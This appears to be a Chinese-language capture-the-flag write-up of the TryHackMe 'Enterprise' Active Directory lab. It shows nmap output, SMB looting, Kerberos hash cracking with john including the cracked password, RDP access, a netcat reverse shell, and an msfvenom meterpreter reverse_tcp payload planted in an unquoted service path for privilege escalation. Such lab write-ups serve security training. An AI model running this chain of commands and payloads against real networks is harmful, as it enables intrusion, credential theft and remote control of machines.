Enterprise
端口扫描
root@ip-10-10-110-123:~/enterprise# nmap -sTCV -p- --min-rate 1000 10.10.213.49
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-29 08:52 GMT
Nmap scan report for ip-10-10-213-49.eu-west-1.compute.internal (10.10.213.49)
Host is up (0.00024s latency).
Not shown: 65507 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-29 08:53:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Not valid before: 2023-10-28T08:48:46
|_Not valid after: 2024-04-28T08:48:46
|_ssl-date: 2023-10-29T08:54:09+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:E1:2C:63:C0:1B (Unknown)
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: LAB-DC, NetBIOS user: <unknown>, NetBIOS MAC: 02:e1:2c:63:c0:1b (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-29 08:54:09
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.01 seconds
info
🔥 我们可以确定域名为 : LAB.ENTERPRISE.THM
SMB
Docs: 给了两个文件但是都是加密内容无法解密Users: 对应的就是C:\Users目录, 自然我们可以利用此快速获取到用户的名称 (之后我尝试 kerberos 利用可惜失效)
我们可以在此获取到一个账号, 但是可惜并没有什么用
smb: \LAB-ADMIN\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\> ls
. D 0 Fri Mar 12 04:00:39 2021
.. D 0 Fri Mar 12 04:00:39 2021
Consolehost_hisory.txt A 424 Fri Mar 12 03:51:46 2021
15587583 blocks of size 4096. 9900318 blocks available
smb: \LAB-ADMIN\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\> get Consolehost_hisory.txt
getting file \LAB-ADMIN\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\Consolehost_hisory.txt of size 424 as Consolehost_hisory.txt (103.5 KiloBytes/sec) (average 103.5 KiloBytes/sec)
7990
我在查看 80 端口无果后, 查看此页面, 发现其显示正在迁移到 github Enterprise.THM
从其存储库中我得到了一个账号
Kerberos
root@ip-10-10-139-192:~# john hash.txt --wordlist=`locate rockyou.txt`
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littleredbucket (?)
1g 0:00:00:02 DONE (2023-10-29 10:36) 0.3690g/s 579447p/s 579447c/s 579447C/s livelife92..littled8
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
后渗透
bitbucket
使用得到的账号进行登陆 bitbucket 我发现无法登陆 winrm 服务但是可以登陆 RDP 服务
root@ip-10-10-139-192:~# xfreerdp /v:10.10.200.231 /u:bitbucket /p:littleredbucket
登陆之后我上传了 nc 获取了一个反向 Shell
bitbucket —> Administrator
上次 winpeas 进行执行我发现其中存在一个 PATH 路径注入
制作木马进行上传到 目标进行执行 我上传到了 C:\Program Files (x86)\Zero Tier\Zero.exe
root@ip-10-10-139-192:~/Test# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.139.192 LPORT=9999 -f exe --arch x64 --platform windows > Zero.exe
上传后重启服务
PS C:\Program Files (x86)\Zero Tier> Stop-Service zerotieroneservice
PS C:\Program Files (x86)\Zero Tier> Start-Service zerotieroneservice
之后我们就可以得到一个 Shell (遗憾的是这个 Shell 超级不稳定只有一分钟左右)
